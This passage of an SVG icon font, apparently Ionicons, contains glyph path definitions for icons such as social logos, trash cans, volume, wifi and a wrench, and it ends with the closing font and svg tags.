c-16 15 -27 33 -30 39s0 9 3 12c3 2 6 6 9 9s4 5 6 9s1 7 0 10s-12 31 -16 42s-10 11 -13 11h-10s-10 -2 -15 -7s-21 -19 -22 -46s18 -54 21 -58s37 -64 93 -88s57 -17 67 -16s33 12 38 25z" />
    <glyph glyph-name="ion-social-windows-outline" unicode="&#xf246;" 
d="M432 167h-216v-149l216 -32v181zM448 183v0v-215l-248 36v179h248zM168 167h-152v-120l152 -22v142zM184 183v0v-177l-184 27v150h184zM432 398v0l-216 -31v-152h216v183zM448 416v0v-217h-248v182zM168 360v0l-152 -22v-123h152v145zM184 378v0v-179h-184v153z" />
    <glyph glyph-name="ion-social-windows" unicode="&#xf247;" 
d="M448 183v0v-215l-248 36v179h248zM184 183v0v-177l-184 27v150h184zM448 416v0v-217h-248v182zM184 378v0v-179h-184v153z" />
    <glyph glyph-name="ion-social-wordpress-outline" unicode="&#xf248;" horiz-adv-x="384" 
d="M192 384c106 0 192 -86 192 -192c0 -9 -1 -18 -2 -26c-12 -85 -79 -153 -165 -164c-8 -1 -17 -2 -25 -2c-106 0 -192 86 -192 192s86 192 192 192zM19 192c0 -68 40 -127 98 -155l-83 225c-10 -21 -15 -45 -15 -70zM214 21c12 2 24 4 35 8c0 1 -1 2 -1 3l-53 145l-33 -96
v0l-19 -55c15 -5 32 -7 49 -7c8 0 15 1 22 2zM216 273l62 -186l17 58c9 22 13 41 13 56c0 21 -7 35 -14 47c-9 14 -17 27 -17 41c0 16 12 30 29 30h2c-31 28 -71 45 -116 45c-60 0 -113 -30 -144 -77c4 0 8 -1 11 -1c18 0 46 3 46 3c9 1 10 -14 1 -15c0 0 -10 -1 -20 -1
l63 -187l38 113l-27 74c-9 0 -18 1 -18 1c-9 0 -8 16 1 15c0 0 28 -3 45 -3c18 0 46 3 46 3c9 1 11 -14 2 -15c0 0 -10 -1 -20 -1zM279 43c45 26 77 71 84 125c1 8 2 16 2 24c0 30 -8 58 -22 83c1 -6 1 -12 1 -18c0 -18 -3 -37 -13 -62l-39 -113z" />
    <glyph glyph-name="ion-social-wordpress" unicode="&#xf249;" horiz-adv-x="384" 
d="M195 177l53 -146c0 -1 6 -13 9 -19c-3 -1 -5 -2 -8 -3v0c-10 -3 -21 -6 -32 -7c-8 -1 -17 -2 -25 -2c-17 0 -34 2 -50 6v0c-2 0 -3 2 -5 2l25 73v0zM17 268c6 0 7 -1 15 -1l93 -255c-3 1 -5 2 -8 3c-63 27 -109 87 -116 158c-1 6 -1 13 -1 19c0 25 7 53 17 76zM366 273
c11 -24 18 -52 18 -81c0 -9 -1 -18 -2 -26c-9 -65 -50 -120 -107 -147c-2 -1 -3 -1 -5 -2l22 65l39 113c10 25 13 45 13 62v19v0c-1 18 -10 44 -36 43h-2c-17 0 -29 -14 -29 -30c0 -14 8 -27 17 -41c7 -12 14 -26 14 -47c0 -15 -4 -34 -13 -56l-17 -58l-62 186
c10 0 20 1 20 1c9 1 7 16 -2 15c0 0 -28 -3 -46 -3c-17 0 -45 3 -45 3c-9 1 -10 -15 -1 -15c0 0 9 -1 18 -1l27 -74l-38 -113l-63 187c10 0 20 2 20 2c9 1 8 15 -1 14c0 0 -28 -2 -46 -2h-34c5 9 11 17 17 25c35 44 90 72 150 72c24 0 48 -5 69 -13c34 -13 63 -36 85 -65
c2 -2 3 -5 5 -7c6 -8 11 -17 15 -26z" />
    <glyph glyph-name="ion-social-yahoo-outline" unicode="&#xf24a;" horiz-adv-x="320" 
d="M289 380c11 0 21 1 31 4l-128 -213v-171c-10 4 -21 4 -32 4s-22 0 -32 -4v171l-128 213c10 -4 21 -4 32 -4s22 0 32 4l96 -160l96 160c10 -4 22 -4 33 -4zM178 180l111 184h-1c-7 0 -15 0 -24 2l-90 -150l-14 -23l-14 23l-89 150c-9 -2 -17 -2 -25 -2h-1l111 -184l2 -4
v-5v-151c6 1 11 0 16 0s11 1 16 0v151v5z" />
    <glyph glyph-name="ion-social-yahoo" unicode="&#xf24b;" horiz-adv-x="320" 
d="M289 380c11 0 21 1 31 4l-128 -213v-171c-10 4 -21 4 -32 4s-22 0 -32 -4v171l-128 213c10 -4 21 -4 32 -4s22 0 32 4l96 -160l96 160c10 -4 22 -4 33 -4z" />
    <glyph glyph-name="ion-social-yen-outline" unicode="&#xf4f1;" horiz-adv-x="384" 
d="M384 416l-112 -208h48v-48h-73l-15 -31v-17h88v-48h-88v-96h-80v96h-88v48h88v17l-14 31h-74v48h48l-112 208h80l112 -221l112 221h80zM304 192h-59l13 24l99 184v0h-43l-122 -240l-122 240h-43l99 -184l13 -24h-59v-16h68l20 -44v-36h-88v-16h88v-96h48v96h88v16h-88v37
l21 43h67v16z" />
    <glyph glyph-name="ion-social-yen" unicode="&#xf4f2;" horiz-adv-x="384" 
d="M384 416l-112 -208h48v-48h-73l-15 -31v-17h88v-48h-88v-96h-80v96h-88v48h88v17l-14 31h-74v48h48l-112 208h80l112 -221l112 221h80z" />
    <glyph glyph-name="ion-social-youtube-outline" unicode="&#xf24c;" horiz-adv-x="512" 
d="M265 352v0h-9h-9c-65 0 -118 -2 -168 -4h-1h-1c-23 0 -42 -22 -42 -49v-1v-1c-2 -34 -3 -70 -3 -105v0v0c0 -35 1 -70 3 -104v-2v-1c0 -14 5 -26 14 -36c8 -9 17 -13 28 -13h1h1c52 -2 108 -4 166 -4h11v0v0h11c58 0 113 2 166 4h1h1c11 0 20 4 28 13c9 10 14 22 14 36v1
v2c2 34 3 68 3 104v0v0c0 36 -1 71 -3 105v1v2c0 27 -19 49 -42 49h-1h-1c-49 2 -103 3 -168 3zM265 384v0c58 0 115 0 170 -3c41 0 74 -36 74 -81c2 -36 3 -72 3 -108s-1 -71 -3 -107c0 -45 -33 -81 -74 -81c-55 -3 -111 -4 -168 -4h-11h-11c-57 0 -113 1 -168 4
c-41 0 -74 36 -74 81c-2 36 -3 71 -3 107s2 71 4 107c0 45 32 82 73 82c55 2 112 3 170 3h9h9zM207 94v197l145 -99z" />
    <glyph glyph-name="ion-social-youtube" unicode="&#xf24d;" horiz-adv-x="512" 
d="M509 299c2 -36 3 -71 3 -107s-1 -71 -3 -107c0 -45 -33 -81 -74 -81c-58 -3 -118 -4 -179 -4s-121 1 -179 4c-41 0 -74 36 -74 81c-2 36 -3 71 -3 107s2 71 4 107c0 45 32 81 73 81c55 3 112 4 170 4h9h9c58 0 115 -1 170 -4c41 0 74 -36 74 -81zM207 94l145 98l-145 99
v-197z" />
    <glyph glyph-name="ion-soup-can-outline" unicode="&#xf4f3;" horiz-adv-x="320" 
d="M160 304c-88 0 -160 29 -160 64s72 64 160 64s160 -29 160 -64s-72 -64 -160 -64zM160 415c-70 0 -126 -19 -126 -43s56 -43 126 -43s126 19 126 43s-56 43 -126 43zM161 288c88 0 158 29 159 64c0 -5 0 -33 -8 -40v-240c0 -35 -64 -64 -152 -64s-152 29 -152 64v240
c-8 6 -8 40 -8 40c0 -35 73 -64 161 -64zM280 72v80c-18 -10 -43 -17 -72 -21h-2c-6 -20 -24 -35 -46 -35s-40 15 -46 35h-2c-29 4 -54 11 -72 21v-80c1 -2 9 -10 30 -18c24 -9 55 -14 90 -14s67 5 91 14c21 8 29 16 29 18zM280 184v91c-33 -12 -75 -19 -119 -19
c-45 0 -87 7 -121 19v-91c18 -10 43 -17 73 -21h3c7 17 24 29 44 29s37 -12 44 -29h3c30 4 55 11 73 21zM178 -16zM160 -16h1h-1v0zM312 32l8 -16c0 -7 -3 -14 -8 -20c-21 -26 -81 -44 -152 -44s-131 18 -152 44c-5 6 -8 13 -8 20l8 16v16c0 -35 63 -64 152 -64
s152 28 152 64v-16z" />
    <glyph glyph-name="ion-soup-can" unicode="&#xf4f4;" horiz-adv-x="320" 
d="M0 368c0 43 53 64 160 64s160 -21 160 -64s-53 -64 -160 -64s-160 21 -160 64zM160 8c-44 0 -80 6 -109 18s-43 28 -43 46v128c0 -9 4 -19 13 -27s21 -15 37 -21s33 -10 54 -13c1 -12 7 -23 16 -31s20 -12 32 -12s23 4 32 12s15 19 16 31c31 4 56 12 75 23s29 24 29 38
v-128c0 -18 -14 -34 -43 -46s-65 -18 -109 -18zM160 288c44 0 82 6 113 18s47 28 47 46v-8c0 -5 -1 -11 -2 -18s-3 -11 -6 -14v-96c0 -14 -10 -27 -29 -38s-44 -19 -76 -23c-2 11 -8 19 -17 26s-19 11 -30 11s-21 -4 -30 -11s-15 -15 -17 -26c-32 4 -57 12 -76 23
s-29 24 -29 38v96c-5 5 -8 18 -8 40c0 -18 16 -34 47 -46s69 -18 113 -18zM312 56v-24l8 -16c0 -7 -3 -14 -8 -20c-11 -13 -30 -24 -58 -32s-59 -12 -94 -12s-66 4 -94 12s-47 19 -58 32c-5 6 -8 13 -8 20l8 16v24c0 -18 14 -34 43 -46s65 -18 109 -18s80 6 109 18
s43 28 43 46z" />
    <glyph glyph-name="ion-speakerphone" unicode="&#xf2b2;" 
d="M39 266c0 -37 20 -69 50 -86c-1 0 -2 1 -3 1s-4 1 -5 1v0c-35 3 -62 33 -69 69c-6 0 -12 7 -12 16c0 8 5 15 11 16c6 42 40 75 81 75h8c-36 -15 -61 -51 -61 -92zM433 357c10 -25 15 -56 15 -88s-5 -63 -15 -88l-3 -9c-6 -14 -15 -26 -24 -34c-10 -10 -22 -19 -34 -20h-3
c-7 0 -15 2 -22 5c-3 2 -10 5 -10 5c-22 10 -84 28 -115 29c-4 -8 -10 -20 -12 -30c-2 -9 -6 -27 -7 -61c-1 -32 1 -59 3 -82c0 -2 1 -5 1 -7c0 -6 -2 -9 -9 -9h-77c-6 0 -9 3 -9 6v7c2 72 25 140 26 145c2 9 5 17 7 30c2 12 -27 13 -40 24c-29 17 -47 49 -47 86
c0 41 25 77 59 92h42h19c58 3 114 21 163 50c1 1 3 1 4 2v0c8 4 16 6 24 6c13 0 26 -6 37 -16c9 -9 18 -21 24 -35c1 -3 2 -5 3 -8zM410 180c9 22 15 54 15 89s-6 66 -15 88c-8 18 -19 29 -30 29s-21 -11 -29 -29c-9 -22 -15 -53 -15 -88s6 -67 15 -89c8 -19 18 -33 29 -33
s22 15 30 33z" />
    <glyph glyph-name="ion-speedometer" unicode="&#xf2b3;" 
d="M312 192l8 -8l-64 -84v-4c0 -18 -14 -32 -32 -32s-32 14 -32 32s14 32 32 32h4zM224 352c124 0 224 -100 224 -224c0 -34 -8 -67 -22 -96h-36c15 27 25 57 26 88h-32v16h32c-1 29 -9 56 -22 81l-27 -15l-8 13l27 16c-8 12 -16 23 -26 33s-21 18 -33 26l-16 -27l-14 8
l16 27c-25 13 -52 21 -81 22v-32h-16v32c-29 -1 -56 -9 -81 -22l16 -27l-14 -8l-16 27c-12 -8 -23 -16 -33 -26s-19 -21 -26 -33l28 -16l-8 -13l-28 15c-13 -25 -21 -52 -22 -81h32v-16h-32c1 -31 11 -61 26 -88h-36c-14 29 -22 62 -22 96c0 124 100 224 224 224z" />
    <glyph glyph-name="ion-spoon" unicode="&#xf2b4;" horiz-adv-x="128" 
d="M128 288c0 64 -26 128 -64 128s-64 -64 -64 -128v0c1 -25 16 -54 37 -64l1 -1v0c3 -2 10 -6 10 -10c0 0 -16 -199 -16 -210s4 -20 10 -26s14 -9 22 -9v0v0c8 0 16 3 22 9s10 13 10 26s-16 210 -16 210c0 4 7 8 10 10l1 1c22 10 37 38 37 64z" />
    <glyph glyph-name="ion-star" unicode="&#xf24e;" 
d="M448 248l-139 -104l55 -176l-140 112l-140 -112l55 176l-139 104h172l52 168l53 -168h171z" />
    <glyph glyph-name="ion-stats-bars" unicode="&#xf2b5;" horiz-adv-x="352" 
d="M96 32v320h64v-320h-64zM0 32v96h64v-96h-64zM192 32v160h64v-160h-64zM288 32v224h64v-224h-64z" />
    <glyph glyph-name="ion-steam" unicode="&#xf30b;" horiz-adv-x="512" 
d="M480 240c0 -20 -16 -37 -37 -37c-20 0 -37 16 -37 37c0 20 16 37 37 37c20 0 37 -17 37 -37zM443 309c38 0 69 -31 69 -69s-31 -70 -69 -70l-67 -48c-2 -26 -24 -47 -51 -47c-25 0 -46 18 -51 41l-196 78c-8 -5 -16 -7 -26 -7c-28 0 -52 24 -52 52s24 52 52 52
c25 0 45 -18 50 -41l196 -79c8 5 17 8 27 8c2 0 3 -1 5 -1l43 62c0 38 32 69 70 69zM443 286c-26 0 -47 -20 -47 -46s21 -47 47 -47s46 21 46 47s-20 46 -46 46zM52 277c-21 0 -38 -17 -38 -38s17 -38 38 -38c3 0 5 0 8 1l-16 6v0c-15 7 -22 24 -16 39s24 23 39 17v0l19 -7
c-6 12 -19 20 -34 20zM325 165c-3 0 -6 -1 -9 -1l16 -6c16 -6 23 -24 17 -40s-23 -23 -39 -17c-6 3 -13 6 -19 8c6 -12 19 -20 34 -20c21 0 38 17 38 38s-17 38 -38 38z" />
    <glyph glyph-name="ion-stop" unicode="&#xf24f;" horiz-adv-x="384" 
d="M373 384c6 0 11 -5 11 -11v-362c0 -6 -5 -11 -11 -11h-362c-6 0 -11 5 -11 11v362c0 6 5 11 11 11h362z" />
    <glyph glyph-name="ion-thermometer" unicode="&#xf2b6;" horiz-adv-x="160" 
d="M127 112c20 -14 33 -38 33 -64c0 -44 -36 -80 -80 -80s-80 36 -80 80c0 27 13 51 33 65v257c0 26 21 46 47 46s47 -20 47 -46v-258zM65 370v-50h30v50c0 8 -7 14 -15 14s-15 -6 -15 -14zM96 160v16h-16v-16h16zM96 192v64h-16v-64h16z" />
    <glyph glyph-name="ion-thumbsdown" unicode="&#xf250;" horiz-adv-x="384" 
d="M24 195c-10 5 -18 17 -18 29c0 14 8 25 20 30c-4 5 -6 12 -6 19c0 14 8 25 20 30c-3 5 -5 11 -5 17c0 18 11 24 35 30s74 12 126 9c23 -1 55 -7 76 -7v32h112v-240h-112v16c-15 -1 -31 -4 -40 -14c-22 -23 -40 -65 -40 -108c0 -19 1 -29 -4 -34c-13 -13 -44 9 -52 37
c-9 34 -1 62 1 87h-103c-19 0 -34 15 -34 34c0 15 10 29 24 33zM336 352c-9 0 -16 -7 -16 -16s7 -16 16 -16s16 7 16 16s-7 16 -16 16z" />
    <glyph glyph-name="ion-thumbsup" unicode="&#xf251;" horiz-adv-x="384" 
d="M360 189c10 -5 18 -17 18 -29c0 -14 -8 -25 -20 -30c4 -5 6 -12 6 -19c0 -14 -8 -25 -20 -30c3 -5 5 -11 5 -17c0 -18 -11 -24 -35 -30s-74 -12 -126 -9c-23 1 -55 7 -76 7v-32h-112v240h112v-16c15 1 31 4 40 14c22 23 40 65 40 108c0 19 -1 29 4 34c13 13 44 -9 52 -37
c9 -34 1 -62 -1 -87h103c19 0 34 -15 34 -34c0 -15 -10 -29 -24 -33zM48 32c9 0 16 7 16 16s-7 16 -16 16s-16 -7 -16 -16s7 -16 16 -16z" />
    <glyph glyph-name="ion-toggle-filled" unicode="&#xf354;" 
d="M320 240c26 0 48 -22 48 -48s-22 -48 -48 -48s-48 22 -48 48s22 48 48 48zM320 320c71 0 128 -57 128 -128s-57 -128 -128 -128h-192c-71 0 -128 57 -128 128s57 128 128 128h192zM320 112c44 0 80 36 80 80s-36 80 -80 80s-80 -36 -80 -80s36 -80 80 -80z" />
    <glyph glyph-name="ion-toggle" unicode="&#xf355;" 
d="M320 288h-192c-53 0 -96 -43 -96 -96s43 -96 96 -96h192c53 0 96 43 96 96s-43 96 -96 96zM320 320v0c71 0 128 -57 128 -128s-57 -128 -128 -128h-192c-71 0 -128 57 -128 128s57 128 128 128h192zM128 240c-26 0 -48 -22 -48 -48s22 -48 48 -48s48 22 48 48
s-22 48 -48 48zM128 272v0c44 0 80 -36 80 -80s-36 -80 -80 -80s-80 36 -80 80s36 80 80 80z" />
    <glyph glyph-name="ion-transgender" unicode="&#xf4f5;" horiz-adv-x="512" 
d="M368 448h144v-144h-40v76l-101 -100c8 -17 13 -36 13 -56c0 -63 -46 -115 -104 -126v-52h72v-46h-72v-64h-48v64h-72v46h72v52c-59 11 -104 63 -104 126c0 20 5 39 13 56l-22 22l-36 -36l-33 33l36 36l-46 45v-76h-40v144h144v-40h-70l43 -42l36 36l33 -33l-36 -36
l17 -17c23 22 54 36 89 36c27 0 53 -8 74 -23c0 0 6 -5 15 -13l93 92h-70v40zM256 144c44 0 80 36 80 80s-36 80 -80 80s-80 -36 -80 -80s36 -80 80 -80z" />
    <glyph glyph-name="ion-trash-a" unicode="&#xf252;" horiz-adv-x="352" 
d="M261 320v0h91v-32h-9s-5 -1 -8 -4s-4 -9 -4 -9l-19 -241c-2 -29 -2 -34 -36 -34h-200c-34 0 -34 5 -36 34l-19 242s-1 6 -4 9s-8 3 -8 3h-9v32h91v29c0 19 14 35 34 35h101c20 0 35 -16 35 -35v-29zM112 349v-29h128v29c0 10 -9 15 -19 15h-91c-10 0 -18 -5 -18 -15z
M104 64h20l-10 192h-21zM187 64v192h-22v-192h22zM249 64l10 192h-20l-11 -192h21z" />
    <glyph glyph-name="ion-trash-b" unicode="&#xf253;" horiz-adv-x="320" 
d="M318 315c3 -12 4 -11 -7 -11h-302c-11 0 -10 -1 -7 11c2 9 4 13 4 13c3 9 9 9 19 11l53 7c7 1 7 1 10 7c9 20 10 31 20 31h103c10 0 12 -11 21 -31c3 -6 3 -6 10 -7l53 -6c10 -2 16 -2 19 -11c0 0 2 -5 4 -14zM283 272c17 0 18 -2 17 -15l-19 -242c-2 -12 -2 -15 -17 -15
h-208c-15 0 -15 3 -17 15l-19 242c-1 12 0 15 17 15h246z" />
    <glyph glyph-name="ion-trophy" unicode="&#xf356;" 
d="M448 345c0 -25 2 -73 -22 -122c-15 -30 -36 -55 -63 -75c-23 -16 -49 -28 -77 -35c-16 -17 -32 -27 -46 -31v-33s0 -49 99 -49h13v-32h-256v32h13c85 0 97 35 99 46v36c-14 4 -30 14 -46 31c-28 7 -55 19 -77 35c-27 20 -48 45 -63 75c-17 36 -21 71 -22 97v0v11v0v21v0
h80c-2 35 0 64 0 64h143h1h1h142s2 -29 0 -64h81v-7zM51 237c17 -34 43 -61 77 -78c-22 40 -33 84 -42 135c-1 8 -2 17 -3 26h-51c1 -23 5 -53 19 -83zM397 237c14 30 18 60 19 83h-51c-1 -9 -3 -18 -4 -26c-9 -51 -20 -95 -42 -135c34 17 61 43 78 78z" />
    <glyph glyph-name="ion-tshirt-outline" unicode="&#xf4f6;" 
d="M146 362l-104 -31l11 -32l39 4l38 5l-2 -38l-14 -255h220l-14 255l-2 38l38 -5l39 -4l11 32l-104 31c-6 -8 -13 -14 -21 -19c-15 -10 -34 -15 -57 -15v0v0c-34 1 -59 11 -78 34zM288 400v0l160 -48l-32 -88l-64 8l16 -289h-288l16 289l-64 -8l-32 88l160 48
c14 -27 31 -39 64 -40c33 0 50 13 64 40z" />
    <glyph glyph-name="ion-tshirt" unicode="&#xf4f7;" 
d="M448 352l-32 -88l-64 8l16 -288h-288l16 288l-64 -8l-32 88l160 48c14 -27 31 -39 64 -40c33 0 50 13 64 40z" />
    <glyph glyph-name="ion-umbrella" unicode="&#xf2b7;" 
d="M344 160v0v0v0zM104 160v0v0v0zM240 399c116 -8 208 -109 208 -227v-12c-4 25 -26 52 -52 52c-29 0 -52 -23 -52 -52v0c0 29 -23 52 -52 52s-49 -12 -52 -45v-135c0 -17 -6 -33 -18 -45s-29 -19 -46 -19c-35 0 -63 29 -63 64c0 9 7 16 16 16s16 -7 16 -16
c0 -18 14 -32 31 -32c18 0 32 14 32 32v134c-1 24 -26 46 -52 46c-29 0 -52 -23 -52 -52v0c0 29 -23 52 -52 52c-27 0 -49 -26 -52 -52v18c0 118 92 213 208 221v1c0 9 7 16 16 16s16 -7 16 -16v-1z" />
    <glyph glyph-name="ion-university" unicode="&#xf357;" 
d="M224 384l224 -111l-92 -60l-132 -85l-160 102v-198l-32 16v203l-32 21zM358 192l10 -82c-16 -12 -112 -78 -144 -110c-32 32 -128 98 -144 110l9 82l135 -88z" />
    <glyph glyph-name="ion-unlocked" unicode="&#xf254;" horiz-adv-x="384" 
d="M22 -32c-12 0 -22 10 -22 22v212c0 12 10 22 22 22h3h19v31c0 42 17 87 43 115s64 46 105 46v0v0c41 0 79 -18 105 -46c20 -21 33 -51 39 -82h-53c-5 18 -13 35 -24 47v0v1c-18 19 -42 29 -67 29v0v0c-25 0 -49 -10 -67 -29v-1v0c-18 -19 -28 -53 -28 -80v-31h265
c12 0 22 -10 22 -22v-212c0 -12 -10 -22 -22 -22h-340z" />
    <glyph glyph-name="ion-upload" unicode="&#xf255;" 
d="M366 215c45 0 82 -37 82 -83s-37 -84 -82 -84h-110v80h48l-80 84l-80 -84h48v-80h-102c-49 0 -90 41 -90 91c0 40 26 74 61 86c5 29 29 51 59 51c10 0 18 -3 26 -7c19 40 59 67 105 67c64 0 115 -53 115 -118v-3z" />
    <glyph glyph-name="ion-usb" unicode="&#xf2b8;" horiz-adv-x="256" 
d="M16 228v0v0zM256 320c0 -11 -6 -21 -14 -27v0c-2 -1 -3 -5 -3 -7c-1 -20 -3 -36 -9 -50c-7 -19 -20 -33 -39 -46c-17 -12 -29 -21 -36 -34c-7 -12 -11 -28 -11 -53v-24c0 -7 2 -13 10 -18c4 -2 7 -6 10 -9c8 -9 14 -21 14 -34c0 -28 -22 -50 -50 -50s-50 22 -50 50v1v0
c0 18 10 33 24 42c5 4 9 5 9 18v0c0 14 -3 17 -10 27s-18 17 -32 26c-19 13 -33 27 -40 46c-6 15 -8 31 -9 39s-2 9 -4 11c-10 6 -16 16 -16 28c0 18 14 32 32 32s32 -14 32 -32c0 -10 -4 -20 -12 -26c-3 -2 -4 -11 -4 -14v0v0c0 -9 3 -18 7 -28c10 -21 45 -44 52 -44
s8 5 8 12v196s-1 2 -3 4h-1v1v0c-9 6 -15 16 -15 27c0 18 14 32 32 32s32 -14 32 -32c0 -11 -5 -21 -14 -27v0c-2 -2 -2 -3 -2 -5v-140c0 -10 2 -12 8 -11c13 3 48 30 52 43c3 10 6 23 7 41v1c0 2 -2 4 -3 6c-10 6 -16 16 -16 28c0 18 14 32 32 32s32 -14 32 -32zM32 240
c9 0 16 7 16 16s-7 16 -16 16s-16 -7 -16 -16s7 -16 16 -16zM128 368c9 0 16 7 16 16s-7 16 -16 16s-16 -7 -16 -16s7 -16 16 -16zM224 304c9 0 16 7 16 16s-7 16 -16 16s-16 -7 -16 -16s7 -16 16 -16z" />
    <glyph glyph-name="ion-videocamera" unicode="&#xf256;" 
d="M335 263v-66l113 35v-89v-88l-113 35v-65c0 -5 -4 -9 -9 -9h-317c-5 0 -9 4 -9 9v12v55v171c0 5 4 9 9 9h208v38c0 4 -6 10 -10 10h-176v48h178c36 0 65 -29 65 -64v-32h52c5 0 9 -4 9 -9zM226 107c20 0 36 16 36 36s-16 35 -36 35s-36 -15 -36 -35c0 -10 4 -19 11 -26
h-68c7 7 11 16 11 26c0 20 -16 36 -36 36s-36 -16 -36 -36s16 -36 36 -36h12h95h11z" />
    <glyph glyph-name="ion-volume-high" unicode="&#xf257;" 
d="M199 40l-95 88h-104v128h104l95 88v-304zM255 92l-20 16c17 24 27 52 27 84s-10 60 -27 84l20 16c20 -28 33 -63 33 -100s-13 -72 -33 -100zM322 46l-21 16c27 36 43 81 43 130s-16 94 -43 130l21 16c30 -41 48 -91 48 -146s-18 -105 -48 -146zM365 369l20 15
c39 -54 63 -120 63 -192s-24 -138 -63 -192l-20 15c36 49 58 111 58 177s-22 128 -58 177z" />
    <glyph glyph-name="ion-volume-low" unicode="&#xf258;" horiz-adv-x="288" 
d="M199 40l-95 88h-104v128h104l95 88v-304zM255 92l-20 16c17 24 28 52 28 84s-11 60 -28 84l20 16c20 -28 33 -63 33 -100s-13 -72 -33 -100z" />
    <glyph glyph-name="ion-volume-medium" unicode="&#xf259;" horiz-adv-x="370" 
d="M199 40l-95 88h-104v128h104l95 88v-304zM255 92l-20 16c17 24 28 52 28 84s-11 60 -28 84l20 16c20 -28 33 -63 33 -100s-13 -72 -33 -100zM322 46l-21 16c27 36 43 81 43 130s-16 94 -43 130l21 16c30 -41 48 -91 48 -146s-18 -105 -48 -146z" />
    <glyph glyph-name="ion-volume-mute" unicode="&#xf25a;" 
d="M224 231l47 51v-180l-47 51h-65v78h65zM332 388c69 -38 116 -112 116 -196c0 -124 -100 -224 -224 -224c-39 0 -76 10 -108 27l-1 1c-69 38 -115 112 -115 196c0 124 100 224 224 224c39 0 75 -10 107 -28h1zM362 93c20 28 33 62 33 99c0 66 -38 123 -92 151
c-6 3 -11 6 -17 8c-19 7 -40 11 -62 11c-37 0 -71 -12 -99 -32l73 -74h-76l-36 35c-20 -28 -32 -62 -32 -99c0 -65 36 -121 90 -150c6 -3 13 -7 19 -9c19 -7 39 -11 61 -11c37 0 72 12 100 32l-20 20v77z" />
    <glyph glyph-name="ion-wand" unicode="&#xf358;" 
d="M192 208l48 48l48 -48l-48 -48zM0 16l176 176l48 -48l-176 -176zM224 352v64h32v-64h-32zM398 344l-45 -45l-23 22l46 45zM127 299l-45 45l22 22l45 -45zM376 50l-46 45l23 23l45 -46zM384 192v32h64v-32h-64z" />
    <glyph glyph-name="ion-waterdrop" unicode="&#xf25b;" horiz-adv-x="320" 
d="M175 409c40 -41 145 -160 145 -288c0 -85 -72 -153 -160 -153c-56 0 -106 27 -134 69c-6 9 -11 19 -15 29c-7 17 -11 35 -11 55v4c1 67 31 131 64 183c20 31 42 57 59 77c9 10 16 18 22 24l1 1v0c4 3 8 6 14 6c5 0 10 -3 14 -6v0zM160 24c55 0 100 45 100 100
c0 14 -3 28 -8 40c-17 -65 -70 -116 -136 -130c13 -6 28 -10 44 -10z" />
    <glyph glyph-name="ion-wifi" unicode="&#xf25c;" 
d="M224 352c80 0 156 -30 214 -84l10 -10l-10 -9l-32 -32l-10 -10l-9 9c-44 41 -103 64 -163 64s-119 -23 -163 -64l-9 -9l-10 10l-32 32l-10 9l10 10c58 54 134 84 214 84v0zM365 192l11 -10l-10 -10l-33 -32l-9 -9l-10 8c-25 22 -57 35 -90 35s-65 -13 -90 -35l-10 -8
l-9 9l-33 32l-10 10l11 10c37 33 83 52 132 54v0h9v0v0c52 0 102 -19 141 -54zM224 32l-10 10l-52 52l-11 10l12 10c17 11 32 20 61 20s47 -9 62 -20l11 -10l-10 -10l-53 -52z" />
    <glyph glyph-name="ion-wineglass" unicode="&#xf2b9;" horiz-adv-x="256" 
d="M167 153c-11 -4 -24 -8 -24 -32v-94c0 -11 4 -19 12 -25c3 -2 7 -4 15 -6c32 -9 48 -16 50 -18c2 -1 4 -3 4 -7c0 0 -14 -3 -96 -3s-96 3 -96 3c0 4 2 6 4 7c2 2 18 9 50 18c8 2 11 4 14 6c8 6 11 14 11 25v94c0 24 -11 28 -22 32s-18 6 -26 11c-12 7 -23 16 -32 26
c-20 23 -31 52 -31 87c0 50 4 100 8 114s14 25 31 25h178c17 0 27 -11 31 -25s8 -65 8 -115c0 -35 -11 -63 -31 -86c-9 -10 -20 -19 -32 -26c-8 -5 -15 -7 -26 -11zM128 178c26 0 50 11 67 28l6 6c16 18 22 35 23 65s-2 83 -8 107h-177c-7 -35 -8 -80 -7 -108s7 -46 23 -64
c2 -3 4 -6 7 -8c17 -16 41 -26 66 -26zM208 277c0 -10 -1 -20 -4 -29s-8 -18 -15 -25l-5 -5c-14 -14 -34 -23 -56 -23c-21 0 -41 8 -55 22l-6 6c-7 7 -12 16 -15 25s-3 15 -4 29c-1 9 0 34 1 53c1 10 2 19 3 22h153c1 -6 2 -14 2 -22c1 -21 1 -45 1 -53zM192 269v0v26
c0 4 -4 8 -8 8s-8 -4 -8 -8v-26c0 -3 1 -6 3 -7c1 -1 3 -1 5 -1c4 0 8 3 8 8zM191 316c1 2 1 4 1 6s-2 4 -4 5s-4 1 -6 1s-4 -1 -5 -3s-1 -4 -1 -6s2 -4 4 -5s4 -1 6 -1s4 1 5 3z" />
    <glyph glyph-name="ion-woman" unicode="&#xf25d;" horiz-adv-x="192" 
d="M30 299c3 12 17 33 42 34h48c24 -1 38 -22 42 -34l29 -104c6 -23 -21 -32 -27 -10l-26 96h-9l46 -169h-43v-127c0 -23 -31 -23 -31 0v127h-10v-127c0 -23 -32 -23 -32 0v127h-42l45 169h-7l-27 -96c-7 -21 -33 -13 -27 10zM133 379c0 -21 -17 -37 -37 -37s-37 16 -37 37
s17 37 37 37s37 -16 37 -37z" />
    <glyph glyph-name="ion-wrench" unicode="&#xf2ba;" 
d="M430 333c14 -14 19 -31 18 -44s-6 -39 -32 -65s-77 -42 -113 -24c-5 3 -13 5 -21 -3c-10 -9 -202 -215 -202 -215c-17 -19 -48 -18 -66 0s-19 49 0 66c0 0 207 194 215 202s5 16 3 22c-20 47 2 89 24 112c22 24 51 31 65 32c13 1 31 -5 44 -18l-57 -56l10 -56l55 -10z
M59 5c6 6 6 17 0 23s-16 6 -22 0s-6 -17 0 -23s16 -6 22 0z" />
    <glyph glyph-name="ion-xbox" unicode="&#xf30c;" 
d="M95 200c-49 -72 -50 -139 -50 -143c-28 38 -45 84 -45 135c0 67 30 128 77 169l3 -1c51 -18 93 -68 93 -68s-38 -33 -78 -92zM448 192c0 -51 -17 -97 -45 -135c0 4 -1 71 -50 143c-40 59 -78 92 -78 92s42 50 93 68l3 1c47 -41 77 -102 77 -169zM169 367
c-37 17 -65 12 -72 10c36 25 80 39 127 39s91 -14 127 -39c-7 2 -35 6 -72 -10c-29 -13 -55 -35 -55 -35s-26 22 -55 35zM327 155c40 -49 54 -85 62 -108l2 -5c-41 -46 -101 -74 -167 -74s-126 28 -167 74l1 5c8 23 23 59 63 108c46 57 103 94 103 94s57 -37 103 -94z" />
  </font>
</defs></svg>
